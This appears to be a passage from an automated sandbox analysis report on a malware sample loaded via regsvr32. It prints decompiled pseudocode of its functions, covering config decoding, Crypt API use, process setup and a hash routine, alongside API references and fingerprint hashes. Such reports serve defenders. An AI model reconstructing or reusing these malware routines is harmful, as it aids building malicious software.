					L6:
					return _t29;
				}
				_t25 = E001E4576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x001e5384
0x001e538c
0x001e53a3
0x001e53be
0x001e53c2
0x001e53c7
0x001e53c9
0x001e53d9
0x001e53e5
0x001e53cb
0x001e53cb
0x001e53ce
0x001e53d3
0x001e53d3
0x001e53c9
0x001e53eb
0x001e53ef
0x001e53ef
0x001e5398
0x001e539d
0x001e53a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 001E4576: SysFreeString.OLEAUT32(00000000), ref: 001E45DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,001E1AF5,?,004F0053,04E09308,00000000,?), ref: 001E53E5

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: c316de4d65895954d069ec5d4931322f4b9839319e367f7f289129d02730d31d
Instruction ID: f5c15c5412d448fc69231ada0bbb6ea03684999515ee3193eaf64aed38068dc4
Opcode Fuzzy Hash: c316de4d65895954d069ec5d4931322f4b9839319e367f7f289129d02730d31d
Instruction Fuzzy Hash: 00014632400A99BBCB229F85CC41FEE7BAAFF14790F448029FE055A120D771D960EB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E1FC2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001E1FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x001e1fc2
0x001e1fcf
0x001e1fd0
0x001e1fd1
0x001e1fd8
0x001e2006
0x001e2007
0x001e200a
0x001e2010
0x00000000
0x00000000
0x001e1fef
0x001e1ff9
0x001e2000
0x00000000
0x001e1ff1
0x001e1ff4
0x001e2014
0x001e1ff6
0x001e1ff6
0x00000000
0x001e1ff6
0x001e1ff4
0x001e201b
0x001e2021
0x001e2021
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 001E200A

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f777dc425deedd1607895f91eaffb872438e30005f45d6e322ff97a88943883e
Instruction ID: 81a7b335f28a57e76aa3fe24662f081fcd3eb7c5967e4ba71e9c8dadf4a0717c
Opcode Fuzzy Hash: f777dc425deedd1607895f91eaffb872438e30005f45d6e322ff97a88943883e
Instruction Fuzzy Hash: C6F03771C01258EFDB04DBD5C488AEDB7B8FF04304F2084AAF502A3240D7B46B84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E49FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001E49FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E001E39C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E001E6837(_a8 + _a8);
					if(_t21 != 0) {
						E001E2E61(_a4, _t21, _t23);
					}
					E001E50CA(_a4);
				}
				return _t21;
			}

0x001e4a06
0x001e4a0d
0x001e4a0f
0x001e4a1e
0x001e4a25
0x001e4a34
0x001e4a38
0x001e4a3f
0x001e4a3f
0x001e4a47
0x001e4a4c
0x001e4a51

APIs

lstrlen.KERNEL32(00000000,00000000,001E70D9,00000000,?,001E62B1,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E4A0F

Part of subcall function 001E39C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001E4A23,00000001,001E70D9,00000000), ref: 001E39FD
Part of subcall function 001E39C5: memcpy.NTDLL(001E4A23,001E70D9,00000010,?,?,?,001E4A23,00000001,001E70D9,00000000,?,001E62B1,00000000,001E70D9,?,00000000), ref: 001E3A16
Part of subcall function 001E39C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001E3A3F
Part of subcall function 001E39C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001E3A57
Part of subcall function 001E39C5: memcpy.NTDLL(00000000,00000000,04E09630,00000010), ref: 001E3AA9

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 7fb4108e2b606d91a6cb018d7ec2f6f9e38287f509155c195f6b8f4f559dbfa4
Instruction ID: 285fa167b0e9c1b8b988ac58f21639e2c8311b4ba2145d878ad3c43e351eab5d
Opcode Fuzzy Hash: 7fb4108e2b606d91a6cb018d7ec2f6f9e38287f509155c195f6b8f4f559dbfa4
Instruction Fuzzy Hash: D0F03A76100948BBCF12AEA6DC40DEF3FAEEF95364B008022FD198B111DB31DA559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E1F7A, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E1F7A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E001E1A15(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E001E17B0(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x001e1f82
0x001e1f9c
0x00000000
0x001e1fb8
0x001e1f93
0x001e1f9a
0x00000000
0x00000000
0x001e1fbf

APIs

lstrlenW.KERNEL32(?,?,?,001E1F20,3D001E90,80000002,001E30C2,001E4106,74666F53,4D4C4B48,001E4106,?,3D001E90,80000002,001E30C2,?), ref: 001E1F9F

Part of subcall function 001E17B0: SysAllocString.OLEAUT32(001E4106), ref: 001E17CA
Part of subcall function 001E17B0: SysFreeString.OLEAUT32(00000000), ref: 001E180A

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 6767447d2002718c42031148fec38731a18ac00da972a9f8b933ee6966773769
Instruction ID: e6cd0a569a926c489442ae247b98574949a20752d481b571396a7bb8543bd848
Opcode Fuzzy Hash: 6767447d2002718c42031148fec38731a18ac00da972a9f8b933ee6966773769
Instruction Fuzzy Hash: 0DF07F3200424ABFDF12AF91DC06EAE3F6AAB18390F048114BA0455061D772D9B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E738C, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E738C(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E001E181D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E001E50CA(_a4);
				}
				return _t12;
			}

0x001e7398
0x001e739d
0x001e73a1
0x001e73a8
0x001e73b3
0x001e73b7
0x001e73b7
0x001e73c0

APIs

Part of subcall function 001E181D: memcpy.NTDLL(00000000,00000110,001E20FA,001E20FA,?,?,001E20FA,?,?,001E6042,?), ref: 001E1853
Part of subcall function 001E181D: memset.NTDLL ref: 001E18C8
Part of subcall function 001E181D: memset.NTDLL ref: 001E18DC

memcpy.NTDLL(001E20FA,001E20FA,00000000,001E20FA,001E20FA,001E20FA,?,?,001E6042,?,?,001E20FA,?), ref: 001E73A8

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction ID: 3026826c6a55db1b4e1f978bfbe45f83e6bd3fd2f08c1a51f75a66dccd34df70
Opcode Fuzzy Hash: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction Fuzzy Hash: E3E08677504A5976CB122A95DC01DFF7F5CDF61790F004015FE0846101D731C91097E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E2206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001E2206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x1ea2d0; // 0x63699bc3
				if(E001E1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x1ea324 = _v8;
				}
				_t31 =  *0x1ea2d0; // 0x63699bc3
				if(E001E1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x1ea2d0; // 0x63699bc3
				if(E001E1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x1ea290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x1ea2d0; // 0x63699bc3
						_t43 = E001E38CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x1ea298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x1ea2d0; // 0x63699bc3
						_t44 = E001E38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x1ea29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x1ea2d0; // 0x63699bc3
						_t45 = E001E38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x1ea2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x1ea2d0; // 0x63699bc3
						_t46 = E001E38CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x1ea004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x1ea2d0; // 0x63699bc3
						_t47 = E001E38CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x1ea02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x1ea2d0; // 0x63699bc3
						_t48 = E001E38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E001E3E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E001E50DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x1ea2d0; // 0x63699bc3
						_t49 = E001E38CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E001E3E49(0, _t49) != 0) {
						_t102 =  *0x1ea37c; // 0x4e09630
						E001E10DD(_t102 + 4, _t54);
					}
					_t50 =  *0x1ea2d4; // 0x4c1d5a8
					_t20 = _t50 + 0x1eb252; // 0x4e087fa
					_t21 = _t50 + 0x1eb7b5; // 0x6976612e
					 *0x1ea320 = _t20;
					 *0x1ea390 = _t21;
					HeapFree( *0x1ea290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x001e2206
0x001e2209
0x001e2229
0x001e2237
0x001e2237
0x001e223c
0x001e2256
0x001e242a
0x001e2431
0x001e2438
0x001e2438
0x001e225c
0x001e2278
0x001e2418
0x001e2422
0x00000000
0x001e227e
0x001e227e
0x001e2283
0x001e2299
0x001e2285
0x001e2285
0x001e2292
0x001e2292
0x001e22a3
0x001e22a5
0x001e22af
0x001e22b4
0x001e22b4
0x001e22af
0x001e22bb
0x001e22d1
0x001e22bd
0x001e22bd
0x001e22ca
0x001e22ca
0x001e22d5
0x001e22d7
0x001e22e1
0x001e22e6
0x001e22e6
0x001e22e1
0x001e22ed
0x001e2303
0x001e22ef
0x001e22ef
0x001e22fc
0x001e22fc
0x001e2307
0x001e2309
0x001e2313
0x001e2318
0x001e2318
0x001e2313
0x001e231f
0x001e2335
0x001e2321
0x001e2321
0x001e232e
0x001e232e
0x001e2339
0x001e233b
0x001e2345
0x001e234a
0x001e234a
0x001e2345
0x001e2351
0x001e2367
0x001e2353
0x001e2353
0x001e2360
0x001e2360
0x001e236b
0x001e236d
0x001e2377
0x001e237c
0x001e237c
0x001e2377
0x001e2383
0x001e2399
0x001e2385
0x001e2385
0x001e2392
0x001e2392
0x001e239d
0x001e239f
0x001e23a2
0x001e23a3
0x001e23aa
0x001e23ac
0x001e23ad
0x001e23ad
0x001e23aa
0x001e23b4
0x001e23ca
0x001e23b6
0x001e23b6
0x001e23c3
0x001e23c3
0x001e23ce
0x001e23dc
0x001e23e6
0x001e23e6
0x001e23eb
0x001e23f1
0x001e23fe
0x001e2404
0x001e240a
0x001e240f
0x001e2415
0x00000000
0x001e2415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,001E55D3,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E22AB
StrToIntExA.SHLWAPI(00000000,00000000,001E55D3,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E22DD
StrToIntExA.SHLWAPI(00000000,00000000,001E55D3,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E230F
StrToIntExA.SHLWAPI(00000000,00000000,001E55D3,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E2341
StrToIntExA.SHLWAPI(00000000,00000000,001E55D3,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E2373
HeapFree.KERNEL32(00000000,?,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E240F
HeapFree.KERNEL32(00000000,?,?,001E55D3,63699BC3,?,?,63699BC3,001E55D3,?,63699BC3,E8FA7DD7,001EA00C,7742C740), ref: 001E2422

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9ad86f2261060cd606791b6c980271ae086e19a1f2d78e666086adaff9875fdb
Instruction ID: 7afa3312b705431f52f301b6cef5aea8791ede00516ea1bcacd245bc8084f832
Opcode Fuzzy Hash: 9ad86f2261060cd606791b6c980271ae086e19a1f2d78e666086adaff9875fdb
Instruction Fuzzy Hash: 88617C70A00985ABC715DBF6CCD8C5F77ADBB8C700B690925F602EB511EB35EA809B61

Uniqueness

Uniqueness Score: -1.00%

Function 001E4C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E4C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x1ea2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x1ea2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x1ea2b0 = _t6;
				 *0x1ea2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x1ea2ac = _t7;
				if(_t7 == 0) {
					 *0x1ea2ac =  *0x1ea2ac | 0xffffffff;
				}
				return 0;
			}

0x001e4c23
0x001e4c2b
0x001e4c30
0x00000000
0x001e4c7d
0x001e4c32
0x001e4c3a
0x001e4c7a
0x00000000
0x001e4c7a
0x001e4c3c
0x001e4c41
0x001e4c53
0x001e4c58
0x001e4c5e
0x001e4c66
0x001e4c6b
0x001e4c6d
0x001e4c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001E6B4E,?,?,00000001), ref: 001E4C23
GetVersion.KERNEL32(?,00000001), ref: 001E4C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 001E4C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 001E4C5E
GetLastError.KERNEL32(?,00000001), ref: 001E4C7D

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: f67bff9b5e3ab2d4cd96f9477d234663a2b7a00ff860390d16412ab8cbd070b7
Instruction ID: 3bfe5e27609e9735beee154d3f0be2a8857b42752ed9d43a51d3ec6da001fd74
Opcode Fuzzy Hash: f67bff9b5e3ab2d4cd96f9477d234663a2b7a00ff860390d16412ab8cbd070b7
Instruction Fuzzy Hash: B0F04970A457829FE764CFE6AC89B1D3B68AB04740FA04119F206EE5E0D37160818B16

Uniqueness

Uniqueness Score: -1.00%

Function 001E3109, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E001E3109(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
